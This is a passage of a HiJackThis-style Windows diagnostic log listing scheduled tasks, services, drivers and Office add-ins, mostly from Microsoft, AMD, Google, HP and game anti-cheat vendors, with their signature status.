O22 - Tasks: (disabled) \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical - {613FBA38-A3DF-4AB8-9674-5604984A299A},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical - {DE434264-8FE9-4C0B-A83B-89EBEEBFF78E},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Clip\LicenseImdsIntegration - C:\WINDOWS\system32\fclip.exe (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Device Setup\Driver Recovery on Reboot - {452f6ddc-7930-4b57-8794-19cd7420241d} - C:\WINDOWS\System32\DeviceSetupManagerAPI.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Flighting\FeatureConfig\BootstrapUsageDataReporting - {D759C938-B375-41CB-A2A2-E6D866A767F4} - C:\Windows\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\DetectHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},DetectHardwareChange - C:\Windows\System32\Autopilot.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\RemediateHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},RemediateHardwareChange - C:\Windows\System32\Autopilot.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\MdmDiagnosticsCleanup - C:\WINDOWS\system32\MdmDiagnosticsTool.exe /clean (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Servicing\OOBEFodSetup - C:\WINDOWS\system32\OOBEFodSetup.exe (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\SharedPC\Account Cleanup - {7750564D-D61C-4557-8A9D-7DF56BDCFF96} - C:\WINDOWS\system32\Windows.SharedPC.AccountManager.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\Shell\ThemeAssetTask_SyncFODState - {3BC5DD7D-EA3B-428C-B9B6-0723DB6A1057} - C:\Windows\System32\Windows.UI.Immersive.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\WaaSMedic\DeferredWork - {72566E27-1ABB-4EB3-B4F0-EB431CB1CB32},DeferralWork - C:\WINDOWS\System32\WaaSMedicSvc.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\WaaSMedic\MaintenanceWork - {72566E27-1ABB-4EB3-B4F0-EB431CB1CB32},MaintenanceWork - C:\WINDOWS\System32\WaaSMedicSvc.dll (sign: 'Microsoft')
O22 - Tasks: (disabled) \Microsoft\Windows\WindowsAI\Recall\InitialConfiguration - {709FD5EF-7296-4154-BD3A-E9830FCFA60A} - C:\WINDOWS\system32\ShellConfigTask.dll (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Office\Office Performance Monitor - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\operfmon.exe (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aemarebackup.dll -f:BackupMareData (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -foScheduledTelemetryRun (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser - C:\WINDOWS\system32\sc.exe start InventorySvc (sign: '')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser Exp - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -foScheduledTelemetryRun express (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\SdbinstMergeDbTask - C:\WINDOWS\system32\sdbinst.exe -mm (sign: 'Microsoft')
O22 - Tasks: (telemetry) \Microsoft\Windows\Sustainability\SustainabilityTelemetry - {6EE41D75-D091-4FB7-9AD5-018760DD25D4} - C:\WINDOWS\system32\EcoScoreTask.dll (sign: 'Microsoft')
O22 - Tasks: \GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem140.0.7272.0{2EBDFBBC-CC96-4FAA-9C21-6D7704C3175B} - C:\Program Files (x86)\Google\GoogleUpdater\140.0.7272.0\updater.exe --wake --system (sign: 'Google LLC')
O22 - Tasks: \HP\HP Print Scan Doctor\Printer Health Monitor - C:\Program Files\HPPrintScanDoctor\HPPrinterHealthMonitor.exe (sign: 'HP Inc.')
O22 - Tasks: \HP\HP Print Scan Doctor\Printer Health Monitor Logon - C:\Program Files\HPPrintScanDoctor\HPPrinterHealthMonitor.exe (sign: 'HP Inc.')
O22 - Tasks: \Microsoft\Office\Office Background Push Maintenance - C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonx64\Microsoft Shared\Office16\opushutil.exe /pushregistration (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 - {84F0FAE1-C27B-4F6F-807B-28CF6F96287D},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 - {429BC048-379E-45E0-80E4-EB1977941B5C},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\AccountHealth\RecoverabilityToastTask - {B7F5B442-EBF8-46CD-9F0B-D8E45ED43492},-flow showtoast -checkup recoverability - C:\WINDOWS\system32\AccountHealth.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Containers\CmCleanup - {F50E9363-6BC8-4DC5-8CAB-7D9F8C1B81B4} - C:\WINDOWS\System32\cmcleanup.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Diagnosis\UnexpectedCodepath - C:\WINDOWS\system32\UCConfigTask.exe (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Flighting\FeatureConfig\GovernedFeatureUsageProcessing - {866F38A9-0302-4926-A36F-E4BAABAAE116} - C:\WINDOWS\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Flighting\FeatureConfig\ReconcileConfigs - {15F5ECE1-4550-4A92-8E26-984FD1DA54FA} - C:\WINDOWS\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Flighting\FeatureConfig\UsageDataReceiver - {D4C0420F-76BD-4F66-A91F-918A93ABEBEB} - C:\Windows\System32\fcon.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Hotpatch\Monitoring - C:\WINDOWS\system32\cmd.exe /d /c C:\WINDOWS\system32\hpatchmonTask.cmd (sign: '')
O22 - Tasks: \Microsoft\Windows\Input\RemoteMouseSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemoteMouseSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemotePenSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemotePenSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Input\RemoteTouchpadSyncDataAvailable - {378EAB97-EFD6-4ED5-9AD9-E64A6AA1E6FA},RemoteTouchpadSyncDataAvailable - C:\Windows\System32\InputCloudStore.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Location\Notifications - C:\WINDOWS\System32\LocationNotificationWindows.exe (file missing)
O22 - Tasks: \Microsoft\Windows\Network Connectivity Status Indicator\NcsiIdentifyUserProxies - {706B965A-8308-4CD4-9900-87C2D79C121B} - C:\Windows\System32\netprofm.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\PerformanceTrace\RequestTrace - {9EFEB182-2EE3-4AF9-AFFA-521410D110D1} - C:\WINDOWS\system32\PerformanceTraceHandler.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\ReFsDedupSvc\Initialization - {DCFF735B-64F7-45F3-B39C-6C66BBE2120F} - C:\WINDOWS\System32\ReFsDedupSvc.exe (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\Sustainability\PowerGridForecastTask - {251E5B1F-E370-4E12-B5BD-B7AD2A8EE810} - C:\WINDOWS\system32\PowerGridForecastTask.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\TPM\Tpm-PreAttestationHealthCheck - {5014B7C8-934E-4262-9816-887FA745A6C4},TpmPreAttestationHealthCheck - C:\WINDOWS\system32\TpmTasks.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\UIEOrchestrator - C:\WINDOWS\system32\UIEOrchestrator.exe /SendHeartbeat (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker - C:\WINDOWS\system32\MusNotification.exe (file missing)
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\UUS Failover Task - C:\WINDOWS\System32\MLEngineStub.exe HandleUusFailoverEvaluationSignalFromWnf (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\WindowsAI\Recall\PolicyConfiguration - {0BE6820D-B667-4CB6-931B-C153A77DA895} - C:\WINDOWS\system32\ShellConfigTask.dll (sign: 'Microsoft')
O22 - Tasks: \Microsoft\Windows\WindowsAI\Settings\InitialConfiguration - {2886e5fb-4f01-4a89-9a0e-5d6a9c8048ac} - C:\WINDOWS\system32\SettingsConfigTask.dll (sign: 'Microsoft')
O22 - Tasks: \Nero\Nero Info - C:\Program Files (x86)\Common Files\Nero\Nero Info\NeroInfo.exe -shedul (sign: 'Nero AG')
O22 - Tasks: Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe (sign: 'Adobe Inc.')
O22 - Tasks: AMD Install Manager - Check For Updates - C:\Program Files\AMD\AMDInstallManager\AMDInstallManager.exe -CheckForUpdates (sign: 'Advanced Micro Devices')
O22 - Tasks: AMDInstallLauncher - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe /InstallAUEP (sign: 'Advanced Micro Devices')
O22 - Tasks: AMDRyzenMasterSDKTask - C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe (sign: 'Advanced Micro Devices')
O22 - Tasks: EPSON XP-4200 Series Update {DC31FB32-87E3-478F-97A5-B218247F7389} - C:\WINDOWS\system32\spool\DRIVERS\x64\3\E1YTSBHE.EXE /EXE:"{DC31FB32-87E3-478F-97A5-B218247F7389}" /F:"Update" (sign: 'SEIKO EPSON CORPORATION')
O22 - Tasks: MicrosoftEdgeUpdateTaskCachedFiles - C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /c {A6C3ECC4-23DD-58C0-8A71-3694A3129510} (sign: 'Microsoft')
O22 - Tasks: ModifyLinkUpdate - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -UpdateCurrentUser (sign: 'Advanced Micro Devices')
O22 - Tasks: OneDrive Reporting Task-S-1-5-21-1101469992-360566321-1039958364-1001 - C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe /reporting (sign: 'Microsoft')
O22 - Tasks: OneDrive Startup Task-S-1-5-21-1101469992-360566321-1039958364-1001 - C:\Program Files\Microsoft OneDrive\25.115.0615.0002\OneDriveLauncher.exe /startInstances (sign: 'Microsoft')
O22 - Tasks: StartCN - C:\Program Files\AMD\CNext\CNext\cncmd.exe startwithdelay (sign: 'Advanced Micro Devices')
O22 - Tasks: StartDVR - C:\Program Files\AMD\CNext\CNext\RSServCmd.exe (sign: 'Advanced Micro Devices')
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical - {613FBA38-A3DF-4AB8-9674-5604984A299A},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical - {DE434264-8FE9-4C0B-A83B-89EBEEBFF78E},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Clip\LicenseImdsIntegration - C:\WINDOWS\system32\fclip.exe (sign: 'Microsoft')
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Management\Autopilot\DetectHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},DetectHardwareChange - C:\Windows\System32\Autopilot.dll (sign: 'Microsoft')
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Management\Autopilot\RemediateHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},RemediateHardwareChange - C:\Windows\System32\Autopilot.dll (sign: 'Microsoft')
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Management\Provisioning\MdmDiagnosticsCleanup - C:\WINDOWS\system32\MdmDiagnosticsTool.exe /clean (sign: 'Microsoft')
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (sign: 'Microsoft')
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (sign: 'Microsoft')
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\WaaSMedic\DeferredWork - {72566E27-1ABB-4EB3-B4F0-EB431CB1CB32},DeferralWork - C:\WINDOWS\System32\WaaSMedicSvc.dll (sign: 'Microsoft')
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\WaaSMedic\MaintenanceWork - {72566E27-1ABB-4EB3-B4F0-EB431CB1CB32},MaintenanceWork - C:\WINDOWS\System32\WaaSMedicSvc.dll (sign: 'Microsoft')
O22 - Tasks_Migrated: (telemetry) \Microsoft\Office\Office Performance Monitor - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\operfmon.exe (sign: 'Microsoft')
O22 - Tasks_Migrated: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (sign: 'Microsoft')
O22 - Tasks_Migrated: \GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem132.0.6833.0{4418C692-6939-4E39-98D4-51FE959A7558} - C:\Program Files (x86)\Google\GoogleUpdater\132.0.6833.0\updater.exe --wake --system (file missing)
O22 - Tasks_Migrated: \HP\HP Print Scan Doctor\Printer Health Monitor - C:\Program Files\HPPrintScanDoctor\HPPrinterHealthMonitor.exe (sign: 'HP Inc.')
O22 - Tasks_Migrated: \HP\HP Print Scan Doctor\Printer Health Monitor Logon - C:\Program Files\HPPrintScanDoctor\HPPrinterHealthMonitor.exe (sign: 'HP Inc.')
O22 - Tasks_Migrated: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 - {84F0FAE1-C27B-4F6F-807B-28CF6F96287D},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks_Migrated: \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 - {429BC048-379E-45E0-80E4-EB1977941B5C},/RuntimeWide - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentasklauncher.dll (sign: 'Microsoft')
O22 - Tasks_Migrated: \Microsoft\Windows\Location\Notifications - C:\WINDOWS\System32\LocationNotificationWindows.exe (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\NetTrace\GatherNetworkInfo - C:\WINDOWS\system32\gatherNetworkInfo.vbs (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\PI\SecureBootEncodeUEFI - C:\WINDOWS\system32\SecureBootEncodeUEFI.exe (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpCmdRun.exe -IdleTask -TaskName WdCacheMaintenance (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Windows Defender\Windows Defender Cleanup - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpCmdRun.exe -IdleTask -TaskName WdCleanup (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpCmdRun.exe Scan -ScheduleJob -ScanTrigger 55 -IdleScheduledJob (file missing)
O22 - Tasks_Migrated: \Microsoft\Windows\Windows Defender\Windows Defender Verification - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24090.11-0\MpCmdRun.exe -IdleTask -TaskName WdVerification (file missing)
O22 - Tasks_Migrated: \Nero\Nero Info - C:\Program Files (x86)\Common Files\Nero\Nero Info\NeroInfo.exe -shedul (sign: 'Nero AG')
O22 - Tasks_Migrated: Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe (sign: 'Adobe Inc.')
O22 - Tasks_Migrated: AMDInstallLauncher - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe /InstallAUEP (sign: 'Advanced Micro Devices')
O22 - Tasks_Migrated: AMDRyzenMasterSDKTask - C:\Program Files\AMD\CNext\CNext\cpumetricsserver.exe (sign: 'Advanced Micro Devices')
O22 - Tasks_Migrated: ModifyLinkUpdate - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -UpdateCurrentUser (sign: 'Advanced Micro Devices')
O22 - Tasks_Migrated: OneDrive Reporting Task-S-1-5-21-1101469992-360566321-1039958364-1001 - C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe /reporting (sign: 'Microsoft')
O22 - Tasks_Migrated: StartAUEP - C:\Program Files\AMD\Performance Profile Client\AUEPMaster.exe (file missing)
O22 - Tasks_Migrated: StartCN - C:\Program Files\AMD\CNext\CNext\cncmd.exe startwithdelay (sign: 'Advanced Micro Devices')
O22 - Tasks_Migrated: StartCNBM - C:\Program Files\AMD\CNext\CNext\cncmd.exe benchmark (sign: 'Advanced Micro Devices')
O22 - Tasks_Migrated: StartDVR - C:\Program Files\AMD\CNext\CNext\RSServCmd.exe (sign: 'Advanced Micro Devices')
O23 - Service R2: "Realtek Bluetooth Device Manager Service" ;RtkServ - (RtkBtManServ) - C:\WINDOWS\RtkBtManServ.exe (sign: 'Realtek Semiconductor Corp.')
O23 - Service R2: Adobe Acrobat Update Service - (AdobeARMservice) - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (sign: 'Adobe Inc.')
O23 - Service R2: AMD Crash Defender Service - C:\WINDOWS\System32\DriverStore\FileRepository\amdfendr.inf_amd64_1aafc0a9b0693712\amdfendrsr.exe (sign: 'Microsoft')
O23 - Service R2: AMD External Events Utility - C:\WINDOWS\System32\DriverStore\FileRepository\u0416936.inf_amd64_750d60fa99d453bd\B416914\atiesrxx.exe (sign: 'Advanced Micro Devices')
O23 - Service R2: GIGABYTE Update Service - (GigabyteUpdateService) - C:\WINDOWS\system32\GigabyteUpdateService.exe (sign: 'GIGA-BYTE TECHNOLOGY CO., LTD.')
O23 - Service R2: HP Print Scan Doctor Service - (HPPrintScanDoctorService) - C:\Program Files\HPPrintScanDoctor\HPPrintScanDoctorService.exe (sign: 'HP Inc.')
O23 - Service R2: Nero BackItUp Background Service 2021 - (NeroBackItUpBackgroundService2021) - C:\Program Files (x86)\Nero\Nero 2020\Nero BackItUp\NBService.exe (sign: 'Nero AG')
O23 - Service R2: Nero Update - (NAUpdate) - C:\Program Files (x86)\Nero\Update\NASvc.exe (sign: 'Nero AG')
O23 - Service R2: Realtek Audio Universal Service - (RtkAudioUniversalService) - C:\WINDOWS\System32\RtkAudUService64.exe (sign: 'Realtek Semiconductor Corp.')
O23 - Service R2: Servizio di base di Microsoft Defender - (MDCoreSvc) - C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.25050.5-0\MpDefenderCoreService.exe (sign: 'Microsoft')
O23 - Service R3: EABackgroundService - C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe (sign: 'Electronic Arts, Inc.')
O23 - Service R3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\steamservice.exe /RunAsService (sign: 'Valve Corp.')
O23 - Service S2: Servizio di Google Updater (GoogleUpdaterService140.0.7272.0) - (GoogleUpdaterService140.0.7272.0) - C:\Program Files (x86)\Google\GoogleUpdater\140.0.7272.0\updater.exe --system --windows-service --service=update (sign: 'Google LLC')
O23 - Service S2: Servizio Google Update (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc (sign: 'Google LLC')
O23 - Service S2: Servizio interno di Google Updater (GoogleUpdaterInternalService140.0.7272.0) - (GoogleUpdaterInternalService140.0.7272.0) - C:\Program Files (x86)\Google\GoogleUpdater\140.0.7272.0\updater.exe --system --windows-service --service=update-internal (sign: 'Google LLC')
O23 - Service S3: BattlEye Service - (BEService) - C:\Program Files (x86)\Common Files\BattlEye\BEService.exe (sign: 'BattlEye Innovations e.K.')
O23 - Service S3: Denuvo Anti-Cheat Update Service - C:\Program Files\Denuvo Anti-Cheat\denuvo-anti-cheat-update-service.exe (sign: 'DENUVO GmbH')
O23 - Service S3: EAAntiCheatService - C:\Program Files\EA\AC\eaanticheat.gameservice.exe (sign: 'Electronic Arts, Inc.')
O23 - Service S3: Easy Anti-Cheat (Epic Online Services) - (EasyAntiCheat_EOS) - C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe (sign: 'EasyAntiCheat Oy')
O23 - Service S3: FileSyncHelper - C:\Program Files\Microsoft OneDrive\25.115.0615.0002\FileSyncHelper.exe (sign: 'Microsoft')
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files\Google\Chrome\Application\138.0.7204.101\elevation_service.exe (sign: 'Google LLC')
O23 - Service S3: OneDrive Updater Service - C:\Program Files\Microsoft OneDrive\25.115.0615.0002\OneDriveUpdaterService.exe (sign: 'Microsoft')
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe (sign: 'Rockstar Games, Inc.')
O23 - Service S3: Servizio Google Update (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc (sign: 'Google LLC')
O23 - Driver R0: AMD PCI Root Bus Lower Filter - (amdkmpfd) - C:\WINDOWS\System32\drivers\amdkmpfd.sys (+safe mode) (sign: 'Advanced Micro Devices Inc.')
O23 - Driver R0: AMD PSP Service - (amdpsp) - C:\WINDOWS\System32\drivers\amdpsp.sys (sign: 'Advanced Micro Devices Inc.')
O23 - Driver R1: CTIIO - C:\Windows\system32\drivers\CtiIo64.sys (sign: 'Microsoft' - Creative Technology Innovation Co., LTd.)
O23 - Driver R2: AMDRyzenMasterDriverV28 - C:\WINDOWS\system32\AMDRyzenMasterDriver.sys (sign: 'Advanced Micro Devices')
O23 - Driver R3: AMD Controller Emulation - (AMDXE) - C:\WINDOWS\System32\drivers\amdxe.sys (sign: 'Advanced Micro Devices Inc.')
O23 - Driver R3: AMD Crash Defender Driver - (amdfendr) - C:\WINDOWS\System32\DriverStore\FileRepository\amdfendr.inf_amd64_1aafc0a9b0693712\amdfendr.sys (sign: 'Advanced Micro Devices')
O23 - Driver R3: AMD Crash Defender Manager Driver - (amdfendrmgr) - C:\WINDOWS\System32\DriverStore\FileRepository\amdfendr.inf_amd64_1aafc0a9b0693712\amdfendrmgr.sys (sign: 'Advanced Micro Devices')
O23 - Driver R3: AMD Function Driver for HD Audio Service - (AtiHDAudioService) - C:\WINDOWS\System32\DriverStore\FileRepository\atihdwt6.inf_amd64_21c8ef1919e76bac\AtihdWT6.sys (sign: 'Advanced Micro Devices')
O23 - Driver R3: AMD GPIO Client Driver - (amdgpio2) - C:\WINDOWS\System32\drivers\amdgpio2.sys (sign: 'Advanced Micro Devices')
O23 - Driver R3: AMD GPIO Client Driver - (amdgpio3) - C:\WINDOWS\System32\drivers\amdgpio3.sys (sign: 'ASMedia Technology Inc.')
O23 - Driver R3: AMD PCI - (AMDPCIDev) - C:\WINDOWS\System32\drivers\AMDPCIDev.sys (sign: 'Advanced Micro Devices Inc.')
O23 - Driver R3: AMD Special Tools Driver - (AmdTools64) - C:\WINDOWS\System32\drivers\AmdTools64.sys (sign: 'Microsoft' - no company)
O23 - Driver R3: AMDSAFD - C:\WINDOWS\System32\DriverStore\FileRepository\amdsafd.inf_amd64_66bdd11a4e97edd1\amdsafd.sys (sign: 'Microsoft' - Advanced Micro Devices)
O23 - Driver R3: amduw23g-416936-f5bd8e50 - C:\WINDOWS\System32\DriverStore\FileRepository\u0416936.inf_amd64_750d60fa99d453bd\B416914\amdkmdag.sys (sign: 'Advanced Micro Devices')
O23 - Driver R3: Realtek Bluetooth Filter Driver - (RtkBtFilter) - C:\WINDOWS\System32\drivers\RtkBtfilter.sys (+safe mode) (sign: 'Realtek Semiconductor Corp.')
O23 - Driver R3: Realtek RT640 NT Driver - (rt640x64) - C:\WINDOWS\System32\drivers\rt640x64.sys (+safe mode) (sign: 'Realtek Semiconductor Corp.')
O23 - Driver R3: Realtek Wireless LAN 802.11ax PCI-E Network Adapter - (rtwlane601) - C:\WINDOWS\System32\drivers\rtwlane601.sys (+safe mode) (sign: 'Realtek Semiconductor Corp.')
O23 - Driver R3: Service for Realtek HD Audio (WDM) - (IntcAzAudAddService) - C:\WINDOWS\system32\drivers\RTKVHD64.sys (sign: 'Realtek Semiconductor Corp.')
O23 - Driver S3: Bluetooth Modem Communications Driver - (BTHMODEM) - C:\WINDOWS\System32\drivers\bthmodem.sys (not signed - Microsoft Corporation - C68BDB6EB26F7BBE6B945EF31F446D4294F5286C)
O23 - Driver S3: Denuvo Anti-Cheat - C:\Program Files\Denuvo Anti-Cheat\denuvo-anti-cheat.sys (sign: 'Microsoft' - Denuvo GmbH)
O23 - Driver S3: EAAntiCheat - C:\WINDOWS\system32\drivers\eaanticheat.sys (file missing)
O23 - Driver S3: gdrv3 - C:\Windows\System32\drivers\gdrv3.sys (sign: 'GIGA-BYTE TECHNOLOGY CO., LTD.')
O23 - Driver S3: Intel(R) Serial IO GPIO Controller Driver - (iaLPSSi_GPIO) - C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys (sign: 'Intel Corporation - Client Components Group')
O23 - Driver S3: SAMSUNG Mobile USB Modem Drivers (DEVGURU Ver.) - (ssudmdm) - C:\WINDOWS\system32\DRIVERS\ssudmdm.sys (sign: 'Samsung Electronics CO., LTD.')
O23 - Driver S3: SAMSUNG Mobile USB Composite Device Driver (DEVGURU Ver.) - (dg_ssudbus) - C:\WINDOWS\system32\DRIVERS\ssudbus2.sys (+safe mode) (sign: 'Samsung Electronics CO., LTD.')
O23 - Driver S3: Service for NVIDIA High Definition Audio Driver - (NVHDA) - C:\WINDOWS\system32\drivers\nvhda64v.sys (sign: 'Nvidia Corporation')
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service: 'rt640x64'
O23 - Dependency: Microsoft Service Group 'NDIS' contains unknown service: 'rtwlane601'
O26 - Office Addin: HKLM\..\AdobeAcroOutlook.SendAsLink - (Adobe Document Cloud for Microsoft Outlook - Acrobat) -> C:\Program Files\Adobe\Acrobat DC\PDFMaker\Mail\Outlook\x64\SendAsLinkAddin.dll (sign: 'Adobe Inc.')
O26 - Office Addin: HKLM\..\MicrosoftDataStreamerforExcel - (Microsoft Data Streamer for Excel) -> C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.vsto (not signed - no company - A9DA61511D2073E5B80ED742394B35C61D96DE3A)
O26 - Office Addin: HKLM\..\NativeShim - (Inquire) -> (no file)
